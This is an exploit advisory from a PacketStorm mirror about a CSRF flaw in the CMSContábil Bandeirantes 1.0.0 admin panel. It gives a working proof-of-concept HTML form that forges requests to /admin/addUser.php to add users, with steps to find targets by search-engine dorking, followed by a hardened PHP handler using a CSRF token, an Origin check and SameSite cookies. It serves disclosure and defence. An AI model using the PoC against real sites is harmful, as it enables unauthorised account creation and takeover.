## https://sploitus.com/exploit?id=PACKETSTORM:173677
======================================================================================================================================  
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |  
| # Vendor : https://scriptmafia.org/ |   
======================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.  
  
[+] Go to the line 12.  
  
[+] Set the target site link, save changes and apply.  
  
[+] Affected file : /admin/addUser.php  
  
[+] Save code as poc.html   
  
<section id="main" class="column" style="height: 680px;">  
  
<h4 class="alert_info">Necessário preencher todos os campos.</h4>  
<!--<h4 class="alert_warning">A Warning Alert</h4>  
  
<h4 class="alert_error">An Error Message</h4>  
  
<h4 class="alert_success">A Success Message</h4>-->  
  
  
<article class="module width_full">  
<form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
<header><h3>Adicionar Usuários</h3></header>  
  
<div class="module_content">  
<fieldset>  
<label>Nome</label>  
<input name="nome" id="nome" value="" type="text">  
</fieldset>  
<fieldset>  
<label>Email</label>  
<input name="email" id="email" value="" type="text">  
</fieldset>  
<fieldset>  
<label>Senha</label>  
<input name="senha" id="senha" value="" type="text">  
</fieldset>  
<div class="clear"></div>  
</div>   
<footer>  
<div class="submit_link">  
<input id="limpar" name="limpar" value="limpar" type="submit">  
<input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
</div>  
</footer>  
</form>   
</article><!-- end of post new article -->  
  
<div class="spacer"></div>  
</section>  
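The form above is accepted because the handler trusts any POST carrying the expected field names. The usual fix is the synchronizer-token pattern backed by an Origin/Referer check and a SameSite session cookie. The following is an added example of a hardened addUser.php handler written for this advisory; it is not the CMSContábil Bandeirantes code, and the function names, the `csrf_token` session key and the placeholder user-creation step are assumptions.

```php
<?php
// Added example, not the vendor's addUser.php: synchronizer token + Origin check
// for the "Adicionar Usuários" form. Names below are assumptions.

// Defense in depth: a SameSite=Lax session cookie is not sent on cross-site POSTs
// (PHP 7.3+ signature of session_set_cookie_params).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Issue one unguessable token per session and embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(array $post, array $session): bool
{
    return isset($post['csrf_token'], $session['csrf_token'])
        && hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Reject POSTs whose Origin (or, failing that, Referer) host is not our own host.
// A request with neither header is treated as cross-site.
function origin_allowed(array $server, string $expectedHost): bool
{
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($src === '') {
        return false;
    }
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strtolower($host) === strtolower($expectedHost);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // HTTP_HOST may carry a port; Origin hosts parsed above never do.
    $expectedHost = explode(':', $_SERVER['HTTP_HOST'] ?? '')[0];

    if (!origin_allowed($_SERVER, $expectedHost) || !csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        // Log the rejection so repeated failures are visible to operators.
        error_log('CSRF check failed on addUser.php from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        exit('Invalid request.');
    }

    // Placeholder for the real user-creation logic (assumed, not the project's code):
    // validate $_POST['nome'], $_POST['email'], $_POST['senha'] and insert the user.
}
?>
<form action="addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <label>Nome</label><input name="nome" type="text">
  <label>Email</label><input name="email" type="text">
  <label>Senha</label><input name="senha" type="password">
  <input name="cadastrar" value="Cadastrar" type="submit">
</form>
```

With this in place, a page hosted elsewhere (such as the poc.html above) cannot know the session-bound token, its Origin header will not match the admin host, and with SameSite=Lax the browser will not attach the session cookie to the cross-site POST at all; any one of the three checks is enough to turn the forged request into a 403.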
  
  
=======================================================================================================================================  
Greetings to : jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |  
=======================================================================================================================================